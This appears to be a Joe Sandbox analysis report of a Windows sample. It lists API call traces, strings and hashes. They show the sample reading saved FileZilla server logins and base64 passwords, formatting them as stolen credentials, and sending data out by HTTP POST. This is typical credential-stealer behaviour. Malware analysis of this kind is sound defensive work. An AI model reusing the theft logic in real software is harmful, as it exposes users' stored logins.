lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,04336A80), ref: 004072FB
lstrcat.KERNEL32(?,04336900), ref: 0040730F
lstrcat.KERNEL32(?,04338830), ref: 00407322
lstrcat.KERNEL32(?,04338878), ref: 00407336
lstrcat.KERNEL32(?,04333870), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,04336A80), ref: 00407399
lstrcat.KERNEL32(?,04336900), ref: 004073AD
lstrcat.KERNEL32(?,04338830), ref: 004073C1
lstrcat.KERNEL32(?,04338878), ref: 004073D4
lstrcat.KERNEL32(?,043338D8), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,04336A80), ref: 00407438
lstrcat.KERNEL32(?,04336900), ref: 0040744B
lstrcat.KERNEL32(?,04338830), ref: 0040745F
lstrcat.KERNEL32(?,04338878), ref: 00407473
lstrcat.KERNEL32(?,04337F90), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,04336A80), ref: 004074D6
lstrcat.KERNEL32(?,04336900), ref: 004074EA
lstrcat.KERNEL32(?,04338830), ref: 004074FD
lstrcat.KERNEL32(?,04338878), ref: 00407511
lstrcat.KERNEL32(?,04337FF8), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,04336A80), ref: 00407574
lstrcat.KERNEL32(?,04336900), ref: 00407588
lstrcat.KERNEL32(?,04338830), ref: 0040759C
lstrcat.KERNEL32(?,04338878), ref: 004075AF
lstrcat.KERNEL32(?,04338060), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,04336A80), ref: 00407613
lstrcat.KERNEL32(?,04336900), ref: 00407626
lstrcat.KERNEL32(?,04338830), ref: 0040763A
lstrcat.KERNEL32(?,04338878), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,04330840), ref: 004077DB
lstrcat.KERNEL32(?,043372B0), ref: 004077EE
lstrlen.KERNEL32(30AA7020), ref: 004077FB
lstrlen.KERNEL32(30AA7020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 1a4790090b2145be4414eb9d8ec18fb4d399ff29a204be037550b3e2c137635a
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 1a4790090b2145be4414eb9d8ec18fb4d399ff29a204be037550b3e2c137635a
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

browser: FileZilla, xrefs: 0040ED99
password: , xrefs: 0040EE3B
<User>, xrefs: 0040EC50
profile: null, xrefs: 0040EDA8
<Host>, xrefs: 0040EBBC
<Port>, xrefs: 0040EC06
login: , xrefs: 0040EE0A
<Pass encoding="base64">, xrefs: 0040EC9A
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
url: , xrefs: 0040EDB7

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: a0f53b9dee15c23e45b6c59822f111f8c24a56193fda47159abce8afca70eb89
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: a0f53b9dee15c23e45b6c59822f111f8c24a56193fda47159abce8afca70eb89
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,043129A0), ref: 00415F11
GetProcAddress.KERNEL32(74DD0000,04312928), ref: 00415F2A
GetProcAddress.KERNEL32(74DD0000,043128E0), ref: 00415F42
GetProcAddress.KERNEL32(74DD0000,043128F8), ref: 00415F5A
GetProcAddress.KERNEL32(74DD0000,04312910), ref: 00415F73
GetProcAddress.KERNEL32(74DD0000,0432E3B8), ref: 00415F8B
GetProcAddress.KERNEL32(74DD0000,04314538), ref: 00415FA3
GetProcAddress.KERNEL32(74DD0000,04314478), ref: 00415FBC
GetProcAddress.KERNEL32(74DD0000,04330228), ref: 00415FD4
GetProcAddress.KERNEL32(74DD0000,04330300), ref: 00415FEC
GetProcAddress.KERNEL32(74DD0000,043301E0), ref: 00416005
GetProcAddress.KERNEL32(74DD0000,04330180), ref: 0041601D
GetProcAddress.KERNEL32(74DD0000,043143D8), ref: 00416035
GetProcAddress.KERNEL32(74DD0000,043303C0), ref: 0041604E
GetProcAddress.KERNEL32(74DD0000,04330318), ref: 00416066
GetProcAddress.KERNEL32(74DD0000,04314378), ref: 0041607E
GetProcAddress.KERNEL32(74DD0000,04330270), ref: 00416097
GetProcAddress.KERNEL32(74DD0000,043301B0), ref: 004160AF
GetProcAddress.KERNEL32(74DD0000,04314518), ref: 004160C7
GetProcAddress.KERNEL32(74DD0000,043302E8), ref: 004160E0
GetProcAddress.KERNEL32(74DD0000,04314618), ref: 004160F8
LoadLibraryA.KERNEL32(04330150,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(04330198,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(043301F8,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(04330288,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(04330108,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75A70000,04330258), ref: 00416172
GetProcAddress.KERNEL32(75290000,043300D8), ref: 00416193
GetProcAddress.KERNEL32(75290000,04330348), ref: 004161AB
GetProcAddress.KERNEL32(75BD0000,043302A0), ref: 004161CD
GetProcAddress.KERNEL32(75450000,04314338), ref: 004161EE
GetProcAddress.KERNEL32(76E90000,0432E3C8), ref: 0041620F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,04330780,?,043387A0,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,043307C0,00000000,?,04337A88,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
RtlAllocateHeap.NTDLL(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

------, xrefs: 004051AD
J&f, xrefs: 00405029
------, xrefs: 004052EF
", xrefs: 004053BA
--, xrefs: 00404F34
------, xrefs: 0040506B
", xrefs: 00405278
------, xrefs: 00404F4B
", xrefs: 00405136

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$J&f
API String ID: 1133489818-3705675087
Opcode ID: 6549ced5a5c600e8a27fb6237dfbce87f6e9a99a23ea1def5b08f040f96c31ba
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 6549ced5a5c600e8a27fb6237dfbce87f6e9a99a23ea1def5b08f040f96c31ba
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,04330750), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,043307E0,00000000,?,04337A88,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,04330780,?,043387A0,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

J&f, xrefs: 00405878
------, xrefs: 004058BB
------, xrefs: 004059FC
------, xrefs: 00405746
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
-A, xrefs: 00405620, 00405D27, 00405623
", xrefs: 00405985
", xrefs: 00405AC6

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A$J&f
API String ID: 148854478-1022722094
Opcode ID: 29ebbbfae3119281cd9698afcc6b9225f01ace085e969b994f58abaeb61f6f03
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: 29ebbbfae3119281cd9698afcc6b9225f01ace085e969b994f58abaeb61f6f03
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: ddc9db654cbe5268d6b62ae2fc0e237d04748efe997b257aa277234eefd120ab
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: ddc9db654cbe5268d6b62ae2fc0e237d04748efe997b257aa277234eefd120ab
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
